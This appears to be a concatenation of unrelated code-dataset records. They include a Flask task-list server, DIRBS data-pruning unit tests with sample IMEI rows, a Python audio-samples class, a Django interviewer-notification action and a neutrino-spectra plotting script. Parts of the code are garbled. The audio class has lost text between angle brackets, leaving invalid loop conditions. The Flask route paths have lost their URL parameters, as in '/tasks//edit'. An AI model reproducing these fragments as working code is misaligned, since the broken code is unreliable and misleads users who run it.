{"api_name": "werkzeug.utils.redirect", "line_number": 111, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 108, "usage_type": "name"}, {"api_name": "data.db_session.create_session", "line_number": 114, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 114, "usage_type": "name"}, {"api_name": "data.news.News", "line_number": 115, "usage_type": "argument"}, {"api_name": "flask.make_response", "line_number": 124, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 124, "usage_type": "call"}, {"api_name": "data.db_session.global_init", "line_number": 127, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 127, "usage_type": "name"}, {"api_name": "data.db_session.create_session", "line_number": 129, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 129, "usage_type": "name"}, 
{"api_name": "data.news.News", "line_number": 130, "usage_type": "call"}, {"api_name": "data.users.User", "line_number": 132, "usage_type": "argument"}, {"api_name": "data.users.User", "line_number": 134, "usage_type": "argument"}, {"api_name": "data.users.User.about.contains", "line_number": 134, "usage_type": "call"}, {"api_name": "data.users.User.about", "line_number": 134, "usage_type": "attribute"}, {"api_name": "data.users.User.id", "line_number": 134, "usage_type": "attribute"}]} +{"seq_id": "304476420", "text": "import numpy\nfrom audio_block import AudioBlock\nfrom ..commons import AudioMessage\nimport moviepy.editor as movie_editor\nimport scipy.io.wavfile\n\nclass AudioSamplesBlock(AudioBlock):\n TYPE_NAME = \"samples\"\n\n def __init__(self, samples):\n super(AudioSamplesBlock, self).__init__()\n self.samples = samples\n self.set_sample_count(samples.shape[0])\n self.inclusive_duration = self.duration\n\n def copy(self):\n if self.instru:\n newob = self.instru.create_note_block(self.music_note)\n else:\n newob = type(self)(self.samples.copy())\n self.copy_values_into(newob)\n return newob\n\n @classmethod\n def create_from_xml(cls, elm, instru):\n music_note = elm.get(\"note\")\n newob = instru.create_note_block(music_note)\n newob.load_from_xml(elm)\n return newob\n\n def readjust(self):\n if self.auto_fit_duration:\n self.set_sample_count(self.samples.shape[0])\n self.inclusive_duration = self.samples.shape[0]\n\n def set_samples(self, samples):\n self.samples = samples\n self.readjust()\n\n def get_samples(self, frame_count, start_from=None, use_loop=True, loop=None):\n if self.paused:\n return None\n if start_from is None:\n start_pos = self.current_pos\n else:\n start_pos = start_from\n\n if loop is None or self.loop == self.LOOP_NEVER_EVER:\n loop = self.loop\n\n audio_message = AudioMessage()\n data = None\n\n if loop and loop != self.LOOP_NEVER_EVER and use_loop:\n spread = frame_count\n start_init_pos = start_pos\n elapsed_pos = 0\n while data is None or data.shape[0]=self.duration:\n break\n read_pos = start_pos%self.samples.shape[0]\n else:\n start_pos %= self.duration\n read_pos = start_pos\n\n if read_pos=self.duration:\n data = numpy.zeros((0, AudioBlock.ChannelCount), dtype=numpy.float32)\n else:\n data = self.samples[start_pos: start_pos+frame_count, :]\n start_pos += data.shape[0]\n if self.midi_channel is not None and start_pos >= self.duration:# and data.shape[0]>0:\n audio_message.midi_messages.append(self.new_midi_note_off_message(data.shape[0]))\n if start_from is None:\n self.lock.acquire()\n self.current_pos = start_pos\n self.lock.release()\n if self.live_once and self.current_pos >= self.duration:\n self.destroy()\n\n if data.shape[0]\", view_func=views.task_page)\n app.add_url_rule(\n \"/new-task\", view_func=views.task_add_page, methods=[\"GET\", \"POST\"]\n )\n app.add_url_rule(\n \"/tasks//edit\", view_func=views.task_edit_page, methods=[\"GET\", \"POST\"]\n )\n app.add_url_rule(\n \"/lists\", view_func=views.lists_page, methods=[\"GET\", \"POST\"]\n )\n app.add_url_rule(\n \"/lists/\", view_func=views.list_page, methods=[\"GET\", \"POST\"]\n )\n app.add_url_rule(\n \"/new-list\", view_func=views.list_add_page, methods=[\"GET\", \"POST\"]\n )\n app.add_url_rule(\n \"/lists//edit\", view_func=views.list_edit_page, methods=[\"GET\", \"POST\"]\n )\n app.add_url_rule(\n \"/lists//new-task\", view_func=views.list_new_task_page, methods=[\"GET\", \"POST\"]\n )\n app.add_url_rule(\n \"/lists//add-task\", view_func=views.list_add_task_page, 
methods=[\"GET\", \"POST\"]\n )\n\n lm.init_app(app)\n lm.login_view = \"login_page\"\n\n dbinit.run(app.config[\"DATABASE_URL\"])\n db = Database(app.config[\"DATABASE_URL\"])\n app.config[\"db\"] = db\n\n return app\n\n\nif __name__ == \"__main__\":\n app = create_app()\n port = app.config.get(\"PORT\", 5000)\n app.run(host=\"0.0.0.0\", port=port)\n", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 2169, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask_login.LoginManager", "line_number": 8, "usage_type": "call"}, {"api_name": "user.get_user", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 17, "usage_type": "call"}, {"api_name": "views.home_page", "line_number": 23, "usage_type": "attribute"}, {"api_name": "views.login_page", "line_number": 25, "usage_type": "attribute"}, {"api_name": "views.logout_page", "line_number": 27, "usage_type": "attribute"}, {"api_name": "views.signup_page", "line_number": 29, "usage_type": "attribute"}, {"api_name": "views.tasks_page", "line_number": 32, "usage_type": "attribute"}, {"api_name": "views.task_page", "line_number": 34, "usage_type": "attribute"}, {"api_name": "views.task_add_page", "line_number": 36, "usage_type": "attribute"}, {"api_name": "views.task_edit_page", "line_number": 39, "usage_type": "attribute"}, {"api_name": "views.lists_page", "line_number": 42, "usage_type": "attribute"}, {"api_name": "views.list_page", "line_number": 45, "usage_type": "attribute"}, {"api_name": "views.list_add_page", "line_number": 48, "usage_type": "attribute"}, {"api_name": "views.list_edit_page", "line_number": 51, "usage_type": "attribute"}, {"api_name": "views.list_new_task_page", "line_number": 54, "usage_type": "attribute"}, {"api_name": "views.list_add_task_page", "line_number": 57, "usage_type": "attribute"}, {"api_name": "dbinit.run", "line_number": 63, "usage_type": "call"}, {"api_name": "database.Database", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "588562614", "text": "\"\"\"\nData pruning unit tests.\n\nCopyright (c) 2018 Qualcomm Technologies, Inc.\n\n All rights reserved.\n\n\n\n Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the\n limitations in the disclaimer below) provided that the following conditions are met:\n\n\n * Redistributions of source code must retain the above copyright notice, this list of conditions and the following\n disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following\n disclaimer in the documentation and/or other materials provided with the distribution.\n\n * Neither the name of Qualcomm Technologies, Inc. nor the names of its contributors may be used to endorse or promote\n products derived from this software without specific prior written permission.\n\n NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY\n THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE\n COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR\n TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nimport datetime\n\nimport pytest\nfrom click.testing import CliRunner\n\nfrom dirbs.cli.prune import cli as dirbs_prune_cli\nfrom dirbs.cli.classify import cli as dirbs_classify_cli\nfrom dirbs.importer.gsma_data_importer import GSMADataImporter\nfrom _fixtures import * # noqa: F403, F401\nfrom _helpers import get_importer, expect_success, from_cond_dict_list_to_cond_list\nfrom _importer_params import OperatorDataParams, StolenListParams, GSMADataParams\n\n\n@pytest.mark.parametrize('operator_data_importer',\n                         [OperatorDataParams(\n                             filename='testData1-operator-operator4-anonymized_20161101_20161130.csv',\n                             operator='1',\n                             extract=False,\n                             perform_leading_zero_check=False,\n                             mcc_mnc_pairs=[{'mcc': '111', 'mnc': '04'}],\n                             perform_unclean_checks=False,\n                             perform_file_daterange_check=False)],\n                         indirect=True)\ndef test_persistent_network_imeis(postgres, db_conn, tmpdir, logger, operator_data_importer, mocked_config):\n    \"\"\"Test Depot ID 96759/1.\n\n    Verify the DIRBS core instance maintains a persistent list of all IMEIs that\n    have ever been seen in operator data. Verify the all-time seen IMEI list does not contain\n    subscriber information. Verify the all-time seen IMEI list is not impacted when operator data is pruned.\n    Verify the all-time seen IMEI list records the date that the IMEI first appeared on a per-operator basis.\n    \"\"\"\n    operator_data_importer.import_data()\n\n    # compare the results before and after pruning\n    with db_conn.cursor() as cur:\n        cur.execute('SELECT imei_norm, first_seen '\n                    'FROM network_imeis ORDER BY imei_norm ASC')\n        result_list_before_prune = [(res.imei_norm, res.first_seen.strftime('%Y%m%d'))\n                                    for res in cur.fetchall()]\n\n    runner = CliRunner()\n    result = runner.invoke(dirbs_prune_cli, ['triplets'], obj={'APP_CONFIG': mocked_config})\n    assert result.exit_code == 0\n\n    with db_conn.cursor() as cur:\n        cur.execute('SELECT imei_norm, first_seen '\n                    'FROM network_imeis ORDER BY imei_norm ASC')\n\n        result_list_after_prune = [(res.imei_norm, res.first_seen.strftime('%Y%m%d'))\n                                   for res in cur.fetchall()]\n\n    assert result_list_after_prune == [('01376803870943', '20161107'), ('21123131308878', '20161110'),\n                                       ('21123131308879', '20161111'), ('21260934121733', '20161106'),\n                                       ('21260934475212', '20161130'), ('21782434077450', '20161124'),\n                                       ('21782434077459', '20161118'), ('38245933AF987001', '20161109'),\n                                       ('38709433212541', '20161113'), ('38847733370026', '20161104'),\n                                       ('64220297727231', '20161112'), ('64220299727231', '20161112')]\n\n    assert result_list_before_prune == result_list_after_prune\n\n\n@pytest.mark.parametrize('operator_data_importer',\n                         [OperatorDataParams(\n                             content='date,imei,imsi,msisdn\\n'\n                                     '20110101,8888#888622222,123456789012345,123456789012345\\n'\n                                     '20110101,88888888622222,123456789012345,123456789012345\\n'\n                                     '20110101,21111111111111,125456789012345,123456789012345\\n'\n                                     '20110101,21111111111112,125456789012345,123456789012345\\n'\n                                     '20110101,88888862222209,123456789012345,123456789012345',\n                             extract=False,\n                             
perform_unclean_checks=False,\n                             perform_region_checks=False,\n                             perform_home_network_check=False,\n                             operator='operator1'\n                         )],\n                         indirect=True)\n@pytest.mark.parametrize('gsma_tac_db_importer',\n                         [GSMADataParams(filename='gsma_dump_emptynontac_july_2016.txt')],\n                         indirect=True)\n@pytest.mark.parametrize('stolen_list_importer',\n                         [StolenListParams(filename='testData1-sample_stolen_list-anonymized.csv')],\n                         indirect=True)\ndef test_prune_classification_state(db_conn, metadata_db_conn, tmpdir, logger, mocked_config,\n                                    operator_data_importer, stolen_list_importer, monkeypatch,\n                                    gsma_tac_db_importer, postgres, mocked_statsd):\n    \"\"\"Test Depot ID not known yet.\n\n    A regulator/partner should be able to run a CLI command to prune the classification_state table.\n    It will remove any classification state data related to obsolete conditions, as well as\n    data whose end_date is earlier than the start of the retention window.\n    \"\"\"\n    # Step 1:\n    # import gsma_dump empty non tac and classify for all the conditions\n    # ['gsma_not_found', 'local_stolen', 'duplicate_mk1', 'malformed_imei', 'not_on_registration_list', ..]\n    # classification_state_table contains records for cond_name \"gsma_not_found\". They all have end_date==None\n\n    # Step 2 - TEST RETENTION WINDOW:\n    # CLI prune will delete rows where the end_date is earlier than the start of the retention window.\n    # retention_months=6\n    # curr_date = datetime.date(2017, 7, 13)\n    # Import different gsma_db and classify to have different end date for gsma_not_found records in\n    # the classification table.\n\n    # Step 3 - TEST CONDITIONS NOT EXISTING:\n    # CLI prune for classification_state will look at the current configured conditions and\n    # remove any entries corresponding to cond_names that no longer exist in the config.\n    # Load a new yaml file without stolen_list condition and run the prune CLI command to test.\n    # -- yaml cond config list:\n    # ['gsma_not_found', 'malformed_imei', 'not_on_registration_list']\n    # -- classification_state condition list:\n    # ['gsma_not_found', 'local_stolen', 'malformed_imei', 'not_on_registration_list']\n\n    # Step 1\n    operator_data_importer.import_data()\n    stolen_list_importer.import_data()\n    gsma_tac_db_importer.import_data()\n\n    runner = CliRunner()\n    db_conn.commit()\n    runner.invoke(dirbs_classify_cli, ['--no-safety-check', '--curr-date', '20170713'],\n                  obj={'APP_CONFIG': mocked_config})\n\n    with db_conn.cursor() as cur:\n        cur.execute('SELECT imei_norm, cond_name, end_date FROM classification_state ORDER BY cond_name, imei_norm')\n        res_list = cur.fetchall()\n        assert len(res_list) == 32\n        assert [(x.imei_norm, x.cond_name, x.end_date) for x in res_list] == \\\n            [('21111111111111', 'gsma_not_found', None),\n             ('21111111111112', 'gsma_not_found', None),\n             ('8888#888622222', 'gsma_not_found', None),\n             ('88888862222209', 'gsma_not_found', None),\n             ('88888888622222', 'gsma_not_found', None),\n             ('12432807272315', 'local_stolen', None),\n             ('12640904324427', 'local_stolen', None),\n             ('12640904372723', 'local_stolen', None),\n             ('12727231272313', 'local_stolen', None),\n             ('12875502464321', 'local_stolen', None),\n             ('12875502572723', 'local_stolen', None),\n             ('12875507272312', 'local_stolen', None),\n             ('12904502843271', 'local_stolen', None),\n             ('12909602432585', 'local_stolen', None),\n             ('12909602872723', 'local_stolen', None),\n             ('12922902206948', 'local_stolen', None),\n             ('12922902243260', 'local_stolen', None),\n             ('12922902432742', 'local_stolen', None),\n             ('12922902432776', 'local_stolen', None),\n             ('12957272313271', 
'local_stolen', None),\n ('17272317272723', 'local_stolen', None),\n ('56773605727231', 'local_stolen', None),\n ('64220204327947', 'local_stolen', None),\n ('64220297727231', 'local_stolen', None),\n ('72723147267231', 'local_stolen', None),\n ('72723147267631', 'local_stolen', None),\n ('8888#888622222', 'malformed_imei', None),\n ('21111111111111', 'not_on_registration_list', None),\n ('21111111111112', 'not_on_registration_list', None),\n ('8888#888622222', 'not_on_registration_list', None),\n ('88888862222209', 'not_on_registration_list', None),\n ('88888888622222', 'not_on_registration_list', None)]\n\n # Step 2\n # all records have end_date == None. Classify twice to have records with different end_date\n # first classification\n with get_importer(GSMADataImporter,\n db_conn,\n metadata_db_conn,\n mocked_config.db_config,\n tmpdir,\n logger,\n mocked_statsd,\n GSMADataParams(filename='gsma_not_found_anonymized.txt')) as imp:\n expect_success(imp, 1, db_conn, logger)\n\n runner.invoke(dirbs_classify_cli, ['--no-safety-check', '--curr-date', '20170713'],\n obj={'APP_CONFIG': mocked_config})\n\n # with db_conn.cursor() as cur:\n cur.execute(\"\"\"SELECT imei_norm, cond_name, end_date\n FROM classification_state\n ORDER BY cond_name, imei_norm\"\"\")\n res_list = cur.fetchall()\n\n gsma_not_found_list = [(x.imei_norm, x.cond_name, x.end_date) for x in res_list\n if x.cond_name == 'gsma_not_found']\n\n assert gsma_not_found_list == [('21111111111111', 'gsma_not_found', None),\n ('21111111111112', 'gsma_not_found', None),\n ('8888#888622222', 'gsma_not_found', None),\n ('88888862222209', 'gsma_not_found', None),\n ('88888888622222', 'gsma_not_found', datetime.date(2017, 7, 13))]\n # second classification\n with get_importer(GSMADataImporter,\n db_conn,\n metadata_db_conn,\n mocked_config.db_config,\n tmpdir,\n logger,\n mocked_statsd,\n GSMADataParams(filename='prune_classification_state_gsma.txt')) as imp:\n expect_success(imp, 1, db_conn, logger)\n\n runner.invoke(dirbs_classify_cli, ['--no-safety-check', '--curr-date', '20160101'],\n obj={'APP_CONFIG': mocked_config})\n\n # with db_conn.cursor() as cur:\n cur.execute('SELECT imei_norm, cond_name, end_date '\n ' FROM classification_state '\n 'ORDER BY cond_name, imei_norm, end_date')\n res_list = cur.fetchall()\n\n gsma_not_found_list = [(x.imei_norm, x.cond_name, x.end_date) for x in res_list if\n x.cond_name == 'gsma_not_found']\n\n assert gsma_not_found_list == [('21111111111111', 'gsma_not_found', datetime.date(2016, 1, 1)),\n ('21111111111112', 'gsma_not_found', datetime.date(2016, 1, 1)),\n ('8888#888622222', 'gsma_not_found', None),\n ('88888862222209', 'gsma_not_found', None),\n ('88888888622222', 'gsma_not_found', datetime.date(2017, 7, 13)),\n ('88888888622222', 'gsma_not_found', None)]\n\n # Step 3\n # Expect not to be in classification_state table after prune:\n # IMEIs 21111111111111 and 21111111111112 for condition gsma_not found (due to end_date)\n # IMEIs for condition stolen_list (due to condition no longer exist)\n\n # this commit is to remove locks from the classification_state table so that\n # the table can be dropped inside the prune. 
The locks were activated by the CLI to classify.\n db_conn.commit()\n\n cond_dict_list = [{'label': 'gsma_not_found',\n 'reason': 'TAC not found in GSMA TAC database',\n 'grace_period_days': 30,\n 'blocking': True,\n 'dimensions': [{'module': 'gsma_not_found'}]\n },\n {'label': 'malformed_imei',\n 'reason': 'Invalid characters detected in IMEI',\n 'grace_period_days': 0,\n 'blocking': False,\n 'dimensions': [{'module': 'malformed_imei'}]\n },\n {'label': 'not_on_registration_list',\n 'reason': 'IMEI not found on local registration list',\n 'grace_period_days': 0,\n 'blocking': True,\n 'max_allowed_matching_ratio': 1.0,\n 'dimensions': [{'module': 'not_on_registration_list'}]\n }]\n\n monkeypatch.setattr(mocked_config, 'conditions', from_cond_dict_list_to_cond_list(cond_dict_list))\n with db_conn.cursor() as cur:\n result = runner.invoke(dirbs_prune_cli, ['--curr-date', '20170913',\n 'classification_state'],\n obj={'APP_CONFIG': mocked_config})\n\n assert result.exit_code == 0\n # ITEMS REMOVED\n # [('17272317272723', 'local_stolen', None), ('12909602872723', 'local_stolen', None),\n # ('12875502572723', 'local_stolen', None), ('12875507272312', 'local_stolen', None),\n # ('64220297727231', 'local_stolen', None), ('12909602432585', 'local_stolen', None),\n # ('64220204327947', 'local_stolen', None), ('72723147267631', 'local_stolen', None),\n # ('72723147267231', 'local_stolen', None), ('12922902243260', 'local_stolen', None),\n # ('12875502464321', 'local_stolen', None), ('12922902432776', 'local_stolen', None),\n # ('12957272313271', 'local_stolen', None), ('12640904324427', 'local_stolen', None),\n # ('12904502843271', 'local_stolen', None), ('12922902432742', 'local_stolen', None),\n # ('12432807272315', 'local_stolen', None), ('12922902206948', 'local_stolen', None),\n # ('56773605727231', 'local_stolen', None), ('12727231272313', 'local_stolen', None),\n # ('12640904372723', 'local_stolen', None),\n # ('21111111111111', 'gsma_not_found', datetime.date(2016, 1, 1)),\n # ('21111111111112', 'gsma_not_found', datetime.date(2016, 1, 1))]\n\n cur.execute('SELECT imei_norm, cond_name, end_date '\n 'FROM classification_state '\n 'ORDER BY cond_name, imei_norm, end_date')\n res_list = cur.fetchall()\n pruned_class_state_table = [(x.imei_norm, x.cond_name, x.end_date) for x in res_list]\n\n assert pruned_class_state_table == [('8888#888622222', 'gsma_not_found', None),\n ('88888862222209', 'gsma_not_found', None),\n ('88888888622222', 'gsma_not_found', datetime.date(2017, 7, 13)),\n ('88888888622222', 'gsma_not_found', None),\n ('8888#888622222', 'malformed_imei', None),\n ('21111111111111', 'not_on_registration_list', None),\n ('21111111111112', 'not_on_registration_list', None),\n ('8888#888622222', 'not_on_registration_list', None),\n ('88888862222209', 'not_on_registration_list', None),\n ('88888888622222', 'not_on_registration_list', None)]\n", "sub_path": "tests/prune.py", "file_name": "prune.py", "file_ext": "py", "file_size_in_byte": 18182, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "click.testing.CliRunner", "line_number": 73, "usage_type": "call"}, {"api_name": "dirbs.cli.prune.cli", "line_number": 74, "usage_type": "argument"}, {"api_name": "pytest.mark.parametrize", "line_number": 46, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 46, "usage_type": "attribute"}, {"api_name": "_importer_params.OperatorDataParams", "line_number": 47, "usage_type": "call"}, {"api_name": 
"click.testing.CliRunner", "line_number": 150, "usage_type": "call"}, {"api_name": "dirbs.cli.classify.cli", "line_number": 152, "usage_type": "argument"}, {"api_name": "_helpers.get_importer", "line_number": 196, "usage_type": "call"}, {"api_name": "dirbs.importer.gsma_data_importer.GSMADataImporter", "line_number": 196, "usage_type": "argument"}, {"api_name": "_importer_params.GSMADataParams", "line_number": 203, "usage_type": "call"}, {"api_name": "_helpers.expect_success", "line_number": 204, "usage_type": "call"}, {"api_name": "dirbs.cli.classify.cli", "line_number": 206, "usage_type": "argument"}, {"api_name": "datetime.date", "line_number": 222, "usage_type": "call"}, {"api_name": "_helpers.get_importer", "line_number": 224, "usage_type": "call"}, {"api_name": "dirbs.importer.gsma_data_importer.GSMADataImporter", "line_number": 224, "usage_type": "argument"}, {"api_name": "_importer_params.GSMADataParams", "line_number": 231, "usage_type": "call"}, {"api_name": "_helpers.expect_success", "line_number": 232, "usage_type": "call"}, {"api_name": "dirbs.cli.classify.cli", "line_number": 234, "usage_type": "argument"}, {"api_name": "datetime.date", "line_number": 246, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 247, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 250, "usage_type": "call"}, {"api_name": "_helpers.from_cond_dict_list_to_cond_list", "line_number": 282, "usage_type": "call"}, {"api_name": "dirbs.cli.prune.cli", "line_number": 284, "usage_type": "argument"}, {"api_name": "datetime.date", "line_number": 312, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 94, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 94, "usage_type": "attribute"}, {"api_name": "_importer_params.OperatorDataParams", "line_number": 95, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 109, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 109, "usage_type": "attribute"}, {"api_name": "_importer_params.GSMADataParams", "line_number": 110, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 112, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 112, "usage_type": "attribute"}, {"api_name": "_importer_params.StolenListParams", "line_number": 113, "usage_type": "call"}]} +{"seq_id": "10862311", "text": "# https://github.com/zhuifengshen/DingtalkChatbot\n# pip install DingtalkChatbot\n# '通知一面面试官'\nfrom django.contrib import messages\n\n\ndef notify_interviewer(self, request, queryset):\n candidates = ''\n interviewers = ''\n for obj in queryset:\n candidates = obj.username + ';' + candidates\n interviewers = f'{obj.first_interviewer_user};{interviewers}'\n # dingtalk\n print('候选人 %s 进入面试环节,亲爱的面试官,请准备好测试: %s' % (candidates, interviewers))\n messages.add_message(request, messages.INFO, '已经成功发送面试通知')\n\n# from dingtalkchatboot.chatbot import DingtalkChatbot\n# from django.conf import settings\n# def send(message, at_mobiles=[]):\n# webhook = settings.DINGTALK_WEB_HOOK\n# xiaoding = DingtalkChatbot(webhook)\n#\n# #方式二: 勾选\"加签\"选项时使用(.v1.5以上新功能)\n# #xiaoding = DingtalkChatbot(webhook, secret=secret)\n#\n# Text消息@所有人\n# xiaoding.send('候选人 %s 进入面试环节,亲爱的面试官,请准备好测试: %s' % (candidates, interviewers))\n", "sub_path": "python_02_django/02_django_admin/apps/myapp/admin_08_dingtalk_intergrated.py", "file_name": "admin_08_dingtalk_intergrated.py", "file_ext": "py", "file_size_in_byte": 1102, "program_lang": "python", "lang": "en", "doc_type": 
"code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.contrib.messages.add_message", "line_number": 15, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 15, "usage_type": "name"}, {"api_name": "django.contrib.messages.INFO", "line_number": 15, "usage_type": "attribute"}]} +{"seq_id": "110806387", "text": "import numpy as np\nimport h5py\nimport matplotlib.pyplot as plt\nfrom scipy.special import lpmv, gamma\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"Read neutrino energy files\")\nparser.add_argument(\"--mass\",help=\"progenitor mass to use as input, default 10\",type=str,default='10')\nparser.add_argument(\"--neutrino\",help=\"neutrino species to use as input, default 0\",type=str,default='0')\nargs = parser.parse_args()\n\n#read luminosity angle-averaged data, spectra data, and full luminosity data, respectively\nlum_dat = np.loadtxt(\"lum_{}M_inu{}.dat\".format((args.mass),(args.neutrino)))\nspec_dat = np.loadtxt(\"lum_spec_{}M_inu{}.dat\".format((args.mass),(args.neutrino)))\nlum_file = h5py.File(\"lum_spec_{}M.h5\".format(args.mass),\"r\")\n\ngrid_file= h5py.File(\"grid.h5\",\"r\")\nphic = np.array(grid_file[\"phic\"])\nthetac = np.array(grid_file[\"thc\"])\ndOmega = np.array(grid_file[\"dOmega\"])\n\ndef fact(n):\n \"\"\"\n Note: math.factorial returns an int, but we want to work only with floats\n \"\"\"\n return gamma(n + 1.)\n\ndef real_sph_harm(l, m, phi=phic, theta=thetac):\n \"\"\"\n Computes the orthonormalized real spherical harmonics Y_lm\n \"\"\"\n if m < 0:\n norm = np.sqrt((2*l + 1.)/(2*np.pi)*fact(l + m)/fact(l - m))\n return norm*np.outer(lpmv(-m, l, np.cos(theta)), np.sin(-m*phi))\n elif m == 0:\n norm = np.sqrt((2*l + 1.)/(4*np.pi))\n return norm*np.outer(lpmv(0, l, np.cos(theta)), np.ones_like(phi))\n else:\n norm = np.sqrt((2*l + 1.)/(2*np.pi)*fact(l - m)/fact(l + m))\n return norm*np.outer(lpmv(m, l, np.cos(theta)), np.cos(m*phi))\n\n#read time and luminosity\ntime = lum_dat[:,0]\nlum_avg = lum_dat[:,1]\n\n#plot angle-averaged Luminosity\nplt.figure()\nplt.plot(time,lum_avg/100.)\nplt.xlabel(r'Time after bounce [s]')\nplt.ylabel(r'Luminosity [10$^{52}$ erg s$^{-1}$]')\nplt.savefig(r'Lum_avg.pdf')\nplt.close()\n\n#plot nu0 luminosity spectra at a given time (index 300 here)\nplt.figure()\nplt.plot(spec_dat[300][1:13],spec_dat[300][13:25],'o')\nplt.figtext(0.6,0.6,'Time = {} s'.format(spec_dat[300][0]))\nplt.xlabel(r'Energy [MeV]')\nplt.ylabel(r'$dL_{\\nu_e}/d\\varepsilon$ [10$^{50}$ erg s$^{-1}$ MeV$^{-1}$]')\nplt.xlim([0,60])\nplt.savefig(r'spec.pdf')\nplt.close()\n\n#plot mean neutrino energy, averaged over all bins and over solid angle\ntime = lum_file[\"nu{}\".format(args.neutrino)][\"g0\"].attrs[\"time\"]\neave = np.array(lum_file[\"nu{}\".format(args.neutrino)][\"eave\"][\"l=0 m=0\"])/np.sqrt(4*np.pi)\nplt.figure()\nplt.plot(time,eave)\nplt.xlabel(r'Time after bounce [s]')\nplt.ylabel(r'Average Neutrino Energy [10$^{50}$ erg s$^{-1}$]')\nplt.savefig(r'eave_avg.pdf')\nplt.close()\n\n#define total, angle-dependent luminosity Ltot_angle\ndum_idx=1\nLtot_angle=np.zeros((len(lum_avg),len(thetac),len(phic)))\nfor l in range(3):\n for m in range(-l,l+1):\n print(l,m)\n Ltot_angle += real_sph_harm(l,m)*lum_dat[:,dum_idx][:,np.newaxis,np.newaxis]\n dum_idx+=1\n\nPH, TH = np.meshgrid(phic, thetac)\ncf = plt.contourf(PH, TH, Ltot_angle[0])\ncb = plt.colorbar(cf)\nplt.show()\n", "sub_path": "models/Fornax_2019/data/spectra_reader.py", "file_name": "spectra_reader.py", "file_ext": "py", 
"file_size_in_byte": 3027, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 14, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 15, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}, {"api_name": "scipy.special.gamma", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 33, "usage_type": "attribute"}, {"api_name": "numpy.outer", "line_number": 34, "usage_type": "call"}, {"api_name": "scipy.special.lpmv", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.outer", "line_number": 37, "usage_type": "call"}, {"api_name": "scipy.special.lpmv", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.outer", "line_number": 40, "usage_type": "call"}, {"api_name": "scipy.special.lpmv", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, 